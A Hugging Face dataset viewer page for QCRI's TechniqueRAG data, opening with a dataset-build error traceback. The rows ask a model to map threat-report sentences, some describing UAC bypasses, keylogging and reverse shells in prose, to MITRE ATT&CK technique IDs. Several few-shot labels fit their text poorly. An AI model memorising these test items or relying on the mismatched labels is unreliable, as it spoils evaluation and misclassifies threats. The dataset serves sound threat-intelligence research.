
QCRI/TechniqueRAG-FS-Ministral-8B
Updated
•
19
Error code: DatasetGenerationCastError Exception: DatasetGenerationCastError Message: An error occurred while generating the dataset All the data files must have the same columns, but at some point there are 2 new columns ({'gold', 'predicted'}) and 1 missing columns ({'output'}). This happened while the json dataset builder was generating data using hf://datasets/QCRI/TechniqueRAG-Datasets/test/expert_fewshot_rankgpt_test.json (at revision a1a522913aaba111e48065ece1fb6847f7d872fd) Please either edit the data files to have matching columns, or separate them into different configurations (see docs at https://hf.co/docs/hub/datasets-manual-configuration#multiple-configurations) Traceback: Traceback (most recent call last): File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/builder.py", line 1871, in _prepare_split_single writer.write_table(table) File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/arrow_writer.py", line 643, in write_table pa_table = table_cast(pa_table, self._schema) File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/table.py", line 2293, in table_cast return cast_table_to_schema(table, schema) File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/table.py", line 2241, in cast_table_to_schema raise CastError( datasets.table.CastError: Couldn't cast instruction: string input: string gold: string predicted: string -- schema metadata -- pandas: '{"index_columns": [], "column_indexes": [], "columns": [{"name":' + 569 to {'instruction': Value(dtype='string', id=None), 'input': Value(dtype='string', id=None), 'output': Value(dtype='string', id=None)} because column names don't match During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/src/services/worker/src/worker/job_runners/config/parquet_and_info.py", line 1433, in compute_config_parquet_and_info_response parquet_operations = convert_to_parquet(builder) File "/src/services/worker/src/worker/job_runners/config/parquet_and_info.py", line 1050, in convert_to_parquet builder.download_and_prepare( File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/builder.py", line 925, in download_and_prepare self._download_and_prepare( File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/builder.py", line 1001, in _download_and_prepare self._prepare_split(split_generator, **prepare_split_kwargs) File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/builder.py", line 1742, in _prepare_split for job_id, done, content in self._prepare_split_single( File "/src/services/worker/.venv/lib/python3.9/site-packages/datasets/builder.py", line 1873, in _prepare_split_single raise DatasetGenerationCastError.from_cast_error( datasets.exceptions.DatasetGenerationCastError: An error occurred while generating the dataset All the data files must have the same columns, but at some point there are 2 new columns ({'gold', 'predicted'}) and 1 missing columns ({'output'}). This happened while the json dataset builder was generating data using hf://datasets/QCRI/TechniqueRAG-Datasets/test/expert_fewshot_rankgpt_test.json (at revision a1a522913aaba111e48065ece1fb6847f7d872fd) Please either edit the data files to have matching columns, or separate them into different configurations (see docs at https://hf.co/docs/hub/datasets-manual-configuration#multiple-configurations)
Need help to make the dataset viewer work? Make sure to review how to configure the dataset viewer, and open a discussion for direct support.
instruction
string | input
string | output
string |
---|---|---|
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: APT41 leveraged sticky keys to establish persistence.
- T1546.008: Event Triggered Execution - Accessibility Features
- Text: can enable remote desktop on the victim's machine.
- T1021.001: Remote Services - Remote Desktop Protocol
- Text: uses netstat -ano to search for specific IP address ranges.
- T1049: System Network Connections Discovery
| actors have been known to use the Sticky Keys replacement within RDP sessions to obtain persistence. | - T1546.008: Event Triggered Execution - Accessibility Features |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Silence has used ProxyBot, which allows the attacker to redirect traffic from the current node to the backconnect server via Sock4\Socks5.
- T1090.002: Proxy - External Proxy
- Text: Chimera has encapsulated Cobalt Strike's C2 protocol in DNS and HTTPS.
- T1572: Protocol Tunneling
- Text: ServHelper has commands for adding a remote desktop user and sending RDP traffic to the attacker through a reverse SSH tunnel.
- T1021.001: Remote Services - Remote Desktop Protocol
| FIN5 maintains access to victim environments by using FLIPSIDE to create a proxy for a backup RDP tunnel. | - T1090.002: Proxy - External Proxy |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: SUNBURST removed IFEO registry values to clean up traces of persistence.
- T1070.009: Indicator Removal - Clear Persistence
- Text: REvil has the capability to destroy files and folders.
- T1485: Data Destruction
- Text: Once Shamoon has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy" to 1.
- T1112: Modify Registry
| Seasalt has a command to delete a specified file. | - T1070.004: Indicator Removal - File Deletion |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: BadPatch has a keylogging capability.
- T1056.001: Input Capture - Keylogging
- Text: Crimson RAT can steal credentials from browsers, collect antivirus information, capture screenshots, and list victim drives, processes, and directories. We have observed how an infected host communicates with a Crimson RAT C&C server to send exfiltrated information including PC name, operating system (OS) information, and the location of the Crimson RAT malware inside the system.
- T1592: Gather Victim Host Information
- T1589: Gather Victim Identity Information
- T1590: Gather Victim Network Information
- T1125: Video Capture
- T1555.003: Credentials from Password Stores - Credentials from Web Browsers
- T1056: Input Capture
- T1113: Screen Capture
- T1003: OS Credential Dumping
- Text: can record audio using any existing hardware recording devices.
- T1123: Audio Capture
| jRAT has the capability to log keystrokes from the victim’s machine, both offline and online. | - T1056.001: Input Capture - Keylogging |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: mshlpweb.dll is a loader that uses a known token impersonation technique to elevate permissions and execute install.bat with high privileges. This process runs as a high-integrity process by default, since its set to auto-elevate within its manifest
- T1134.002: Access Token Manipulation - Create Process with Token
- Text: The payload contains an exploit for the unpatched local privilege escalation vulnerability CVE-2015-1701 in Microsoft Windows. The exploit uses CVE-2015-1701 to execute a callback in userspace. The callback gets the EPROCESS structures of the current process and the System process, and copies data from the System token into the token of the current process. Upon completion, the payload continues execution in usermode with the privileges of the System process
- T1134.001: Access Token Manipulation - Token Impersonation/Theft
- Text: Cobalt Strike can make tokens from known credentials.
- T1134.003: Access Token Manipulation - Make and Impersonate Token
| The actor has used this method on its 2019 campaign as well. This UAC bypass starts by executing wusa.exe using ShellExecuteExw and gets its access token using NtOpenProcessToken. Then the access token of wusa.exe is duplicated using NtDuplicatetoken. The DesiredAccess parameter of this function specifies the requested access right for the new token. In this case the actor passed TOKEN_ALL_ACCESS as DesiredAccess value which indicates that the new token has the combination of all access rights of this current token. The duplicated token is then passed to ImpersonateLoggedOnUser and then a cmd instance is spawned using CreateProcessWithLogomW. At the end the duplicated token is assigned to the created thread using NtSetINformationThread to make it elevated | - T1134.002: Access Token Manipulation - Create Process with Token |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Bankshot grabs a user token using WTSQueryUserToken and then creates a process by impersonating a logged-on user.
- T1134.002: Access Token Manipulation - Create Process with Token
- Text: The tokens for each platform are hardcoded within the sample:November 2016 to January 2017: "Evil New Year" CampaignIn the early part of 2017, Group123 started the "Evil New Year" campaign
- T1134: Access Token Manipulation
- Text: KONNI has used parent PID spoofing to spawn a new `cmd` process using `CreateProcessW` and a handle to `Taskmgr.exe`.
- T1134.004: Access Token Manipulation - Parent PID Spoofing
| Azorult can call WTSQueryUserToken and CreateProcessAsUser to start a new process with local system privileges. | - T1134.002: Access Token Manipulation - Create Process with Token |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: In addition to the aforementioned DOCX file, we found another related DDE enabled document based on an infrastructure overlap with a Zebrocy C2 IP address. This related delivery document was an RTF file that downloaded and installed a payload used to load the open-source Koadic tool. We do not have telemetry on the target or attack vector, but we know the RTF file used DDE to download and execute an executable that loaded Koadic. We believe the actor used a cryptor on the payload, as it obtains a filename and script from within its resources and decodes these resources by multiplying each byte by negative one. The payload then uses the MD5 hash (14331d289e737093994395d3fc412afc) of what appears to be a hardcoded SHA1 hash (B6A75B1EF701710D7AEADE0FE93DE8477F3BD506) as an RC4 key to decrypts the resulting decoded data. The embedded VBScript is retrieved from a resource and decrypted using the same algorithm as discussed above, which results in the following cleartext
- T1140: Deobfuscate/Decode Files or Information
- Text: Lazarus Group has used VBA and embedded macros in Word documents to execute malicious code.
- T1059.005: Command and Scripting Interpreter - Visual Basic
- Text: The function hashing algorithm is used to map a hash value of a given function name to its corresponding location in memory using a process known as Run-Time Dynamic Linking. Pre-computed hashes are passed to the hashing algorithm alongside the Windows library containing the related function name. Each function name within the library is hashed; when a match is found, its address is saved
- T1027: Obfuscated Files or Information
| WIRTE has used Base64 to decode malicious VBS script. | - T1140: Deobfuscate/Decode Files or Information |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: ShimRatReporter spoofed itself as "AlphaZawgyl_font.exe", a specialized Unicode font.
- T1036.005: Masquerading - Match Legitimate Name or Location
- Text: Replying to @ESETresearchAttackers replaced win_fw.dll, an internal component that is executed during IDA Pro installation, with a malicious DLL. The malicious win_fw.dll creates a Windows scheduled task that starts a second malicious component, idahelper.dll, from the IDA plugins folder
- T1036.004: Masquerading - Masquerade Task or Service
- T1574.002: Hijack Execution Flow - DLL Side-Loading
- Text: The CozyCar dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file.
- T1036.003: Masquerading - Rename System Utilities
| KGH_SPY has masqueraded as a legitimate Windows tool. | - T1036.005: Masquerading - Match Legitimate Name or Location |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Impacket can be used to sniff network traffic via an interface or raw socket.
- T1040: Network Sniffing
- Text: The communication between the malware and the server is based on the HTTP protocol and slightly varies between the samples. Every few seconds the backdoor sends a POST request to the C&C URL. The result is encrypted and sent back to another URL on the server as the parameter of a POST request
- T1071.001: Application Layer Protocol - Web Protocols
- Text: Cobalt Strike can mimic the HTTP protocol for C2 communication, while hiding the actual data in either an HTTP header, URI parameter, the transaction body, or appending it to the URI.
- T1001.003: Data Obfuscation - Protocol Impersonation
| When loaded, the FoggyWeb backdoor (originally named Microsoft.IdentityServer.WebExtension.dll by its developer) functions as a passive and persistent backdoor that allows abuse of the Security Assertion Markup Language (SAML) token. The backdoor configures HTTP listeners for actor-defined URIs that mimic the structure of the legitimate URIs used by the target’s AD FS deployment. The custom listeners passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor. This version of FoggyWeb configures listeners for the following hardcoded URI patterns (which might vary per target | - T1550: Use Alternate Authentication Material
- T1040: Network Sniffing |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: can capture a screenshot from a victim.
- T1113: Screen Capture
- Text: VERMIN can perform audio capture.
- T1123: Audio Capture
- Text: After deobfuscation you can see “Imminent Monitor” string which may indicate it is related to Imminent Monitor RAT
- T1070.004: Indicator Removal - File Deletion
- T1123: Audio Capture
- T1125: Video Capture
| is capable of performing screen captures. | - T1113: Screen Capture |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: RunningRat is a remote access Trojan (RAT) that operates with two DLLs. This DLL serves three main functions: killing antimalware, unpacking and executing the main RAT DLL, and obtaining persistence. The malware drops the Windows batch file dx.bat, which attempts to kill the task daumcleaner.exe; a Korean security program. The batch file then attempts to remove itself
- T1059.003: Command and Scripting Interpreter - Windows Command Shell
- Text: can execute commands on victims.
- T1059: Command and Scripting Interpreter
- Text: ThiefQuest uses AppleScript's "osascript -e" command to launch ThiefQuest's persistence via Launch Agent and Launch Daemon.
- T1059.002: Command and Scripting Interpreter - AppleScript
| can open an interactive command-shell to perform command line functions on victim machines. | - T1059: Command and Scripting Interpreter |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: TeamTNT has deployed different types of containers into victim environments to facilitate execution. TeamTNT has also transferred cryptocurrency mining software to Kubernetes clusters discovered within local IP address ranges.
- T1610: Deploy Container
- Text: Hildegard has used the BOtB tool that can break out of containers.
- T1611: Escape to Host
- Text: PcShare can execute `cmd` commands on a compromised host.
- T1059.003: Command and Scripting Interpreter - Windows Command Shell
| Peirates can deploy a pod that mounts its node’s root file system, then execute a command to create a reverse shell on the node. | - T1610: Deploy Container |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: There is a command ftpversion that uploads the version of the backdoor (hardcoded) to a file `ver.txt` on the FTP server, in the root folder for the target.
- T1059: Command and Scripting Interpreter
- T1105: Ingress Tool Transfer
- Text: DropBook is a Python-based backdoor compiled with PyInstaller.
- T1059.006: Command and Scripting Interpreter - Python
- Text: OilRig has used macros to deliver malware such as QUADAGENT and OopsIE. OilRig has used batch scripts.
- T1059.003: Command and Scripting Interpreter - Windows Command Shell
| PoetRAT has executed a Lua script through a Lua interpreter for Windows. | - T1059: Command and Scripting Interpreter |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: GoldFinder logged and stored information related to the route or hops a packet took from a compromised machine to a hardcoded C2 server, including the target C2 URL, HTTP response/status code, HTTP response headers and values, and data received from the C2 node.
- T1119: Automated Collection
- Text: Empire has the ability to automatically send collected data back to the threat actors' C2.
- T1020: Automated Exfiltration
- Text: An additional batch script named “dirsb.bat” was used to gather folder and file names from hosts on the network
- T1083: File and Directory Discovery
| OutSteel can automatically scan for and collect files with specific extensions. | - T1119: Automated Collection |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: The Trojan checks the modified time of the file by creating an HTTP request to a URL structured as follows: <Google Drive URL in ‘gdu’> + <file identifier> + “?supportTeamDrives=true&fields=modifiedTime” The Trojan then uses the following regular expression to obtain the modified time of the file from the HTTP response, which is saved to the variable named modification_time: \”modifiedTime\”:(.*) The Trojan then uploads a second file to the Google Drive, the purpose of which is to allow the Trojan to continually write to this file as it waits for the actor to modify the first file uploaded
- T1070.006: Indicator Removal - Timestomp
- T1074: Data Staged
- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification
- T1105: Ingress Tool Transfer
- Text: FIN8 has used "sslip.io", a free IP to domain mapping service that also makes SSL certificate generation easier for traffic encryption, as part of their command and control.
- T1102: Web Service
- Text: uses a PowerShell script to launch shellcode that retrieves an additional payload.
- T1059.001: Command and Scripting Interpreter - PowerShell
| can download additional files and payloads to compromised hosts. | - T1105: Ingress Tool Transfer |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: MSTIC previously tracked ACTINIUM activity as DEV-0157, and this group is also referred to publicly as Gamaredon
- T1105: Ingress Tool Transfer
- T1608.001: Stage Capabilities - Upload Malware
- T1059.001: Command and Scripting Interpreter - PowerShell
- T1059.005: Command and Scripting Interpreter - Visual Basic
- Text: We have discovered that malware dubbed WinDealer, spread by Chinese-speaking APT actor LuoYu, has an ability to perform intrusions through a man-on-the-side attack
- T1204.001: User Execution - Malicious Link
- T1566.002: Phishing - Spearphishing Link
- T1566.001: Phishing - Spearphishing Attachment
- T1566.002: Phishing - Spearphishing Link
- T1120: Peripheral Device Discovery
- Text: 2) The additional commands and execution objects are executed in the machine that has been compromised in the isolated network
- T1204.002: User Execution - Malicious File
| The Gorgon Group Crew Breakdown Finding accessible directories, in combination with their other operational security failures, made it easy to start connecting the dots on Gorgon Group members. 360 and Tuisec already identified some Gorgon Group members. In addition to Subaat, we counted an additional four actors performing attacks as part of Gorgon Group. While it’s not known if the attackers physically reside in Pakistan, all members of Gorgon Group purport to be in Pakistan based on their online personas. fudpages One member of Gorgon Group- we're calling ‘fudpages’, was found during this campaign activity based on their utilization of shared infrastructure. One specific Microsoft document drew our attention. 446e1c80102c8b9662d66d44525cb9f519369061b02446e0d4cd30cd26d79a25) This Microsoft Word document was sent via email to several industries across the US and Switzerland. We noticed that this document pulls down additional malware from a C2 also being used in attacks by other Gorgon Group members. Additionally, this document communicates to a relatively new piece of C2 infrastructure- umarguzardijye[.]com, which is hosted on 91[.]234[.]99[.]206 | - T1566.001: Phishing - Spearphishing Attachment |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Lazarus Group malware IndiaIndia obtains and sends to its C2 server information about the first network interface card’s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available.
- T1016: System Network Configuration Discovery
- Text: can gather information about TCP connection state.
- T1049: System Network Connections Discovery
- Text: MURKYTOP has the capability to identify remote hosts on connected networks.
- T1018: Remote System Discovery
| Clambling can enumerate the IP address of a compromised machine. | - T1016: System Network Configuration Discovery |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: TA459 has targeted victims using spearphishing emails with malicious Microsoft Word attachments.
- T1566.001: Phishing - Spearphishing Attachment
- Text: ESET researchers have discovered several previously undocumented post-compromise tools used by the highly active Gamaredon threat group in various malicious campaigns. One tool, a VBA macro targeting Microsoft Outlook, uses the target’s email account to send spearphishing emails to contacts in the victim’s Microsoft Office address book. We also analyzed further Gamaredon tools that have the ability to inject malicious macros and remote templates into existing Office documents
- T1039: Data from Network Shared Drive
- T1204.002: User Execution - Malicious File
- T1534: Internal Spearphishing
- T1083: File and Directory Discovery
- Text: LazyScripter has used spam emails that contain a link that redirects the victim to download a malicious document.
- T1566.002: Phishing - Spearphishing Link
| ROKRAT has been delivered via spearphishing emails that contain a malicious Hangul Office or Microsoft Word document. | - T1566.001: Phishing - Spearphishing Attachment |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Remexi gathers and exfiltrates keystrokes from the machine.
- T1056.001: Input Capture - Keylogging
- Text: MacSpy can capture screenshots of the desktop over multiple monitors.
- T1113: Screen Capture
- Text: Empire can use Dropbox and GitHub for C2.
- T1102.002: Web Service - Bidirectional Communication
| The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs | - T1056.001: Input Capture - Keylogging
- T1056: Input Capture |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: After downloading the executable payload, the secondary VBScript runs the following command on the command line (T1059) to kill any existing msiexec.exe process instances and use the ping application to sleep for two seconds before using the legitimate msiexec.exe application (T1218) to launch the downloaded PlayerVLC.msi file
- T1105: Ingress Tool Transfer
- Text: has used Mshta.exe to execute its payload.
- T1218.005: System Binary Proxy Execution - Mshta
- Text: NETWIRE can issue commands using cmd.exe.
- T1059.003: Command and Scripting Interpreter - Windows Command Shell
| SpeakUp downloads and executes additional files from a remote server. | - T1105: Ingress Tool Transfer |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: FoggyWeb's loader can call the "load()" function to load the FoggyWeb dll into an Application Domain on a compromised AD FS server.
- T1129: Shared Modules
- Text: PipeMon can inject its modules into various processes using reflective DLL loading.
- T1055.001: Process Injection - Dynamic-link Library Injection
- Text: Chinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.
- T1218.005: System Binary Proxy Execution - Mshta
- T1218.011: System Binary Proxy Execution - Rundll32
| Attor's dispatcher can execute additional plugins by loading the respective DLLs. | - T1129: Shared Modules |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: HAFNIUM has used "rundll32" to load malicious DLLs.
- T1218.011: System Binary Proxy Execution - Rundll32
- Text: The SodomMain module is LookBack malware’s remote access Trojan module that can send and receive numerous commands indicative of its function as a RAT. The malware is delivered within the encoded data that is received by the SodomNormal module as part of its initial beacon response. It then runs within the SodomNormal module and uses its “send_data” function for C&C communications
- T1574.002: Hijack Execution Flow - DLL Side-Loading
- Text: Activation of these hooks is done by Ebury injecting its dynamic library into every descendant processes of sshd. To inject itself into subprocesses, Ebury hooks execve and use the dynamic linker LD_PRELOAD variable. Every time a new process is created, Ebury adds LD_PRELOAD=<Ebury_filename> to its environment. Once the new process is executed, Ebury’s dynamic library is loaded and its constructor is called, executing the hooking routines
- T1574.006: Hijack Execution Flow - Dynamic Linker Hijacking
| This dynamic link library appears to be a legitimate version of libcurl.dll except for a single exported function, which is referred to as ordinal #52 and curl_share_init in the analyzed sample. This function has been modified by threat actors to extract a resource contained within libcurl.dll, decrypt malicious data included in that resource, and load the resulting DLL to execute a malicious function. When this function is executed, the SodomNormal communications module begins running within Libcurl.dll | - T1140: Deobfuscate/Decode Files or Information |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix. In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol. APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing OS command control code
- T1027: Obfuscated Files or Information
- T1036.004: Masquerading - Masquerade Task or Service
- Text: Chaes has used Base64 to encode C2 communications.
- T1132.001: Data Encoding - Standard Encoding
- Text: Specifies the screen coordinates to take -zip Name of password (from configuration data) protected zip archive -clipboard Screenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory, zipped with password from configuration Data exfiltration Exfiltration is done through the bitsadmin.exe utility
- T1113: Screen Capture
- T1115: Clipboard Data
- T1560: Archive Collected Data
- T1132: Data Encoding
- T1486: Data Encrypted for Impact
| Dark Caracal has obfuscated strings in Bandook by base64 encoding, and then encrypting them. | - T1027: Obfuscated Files or Information |
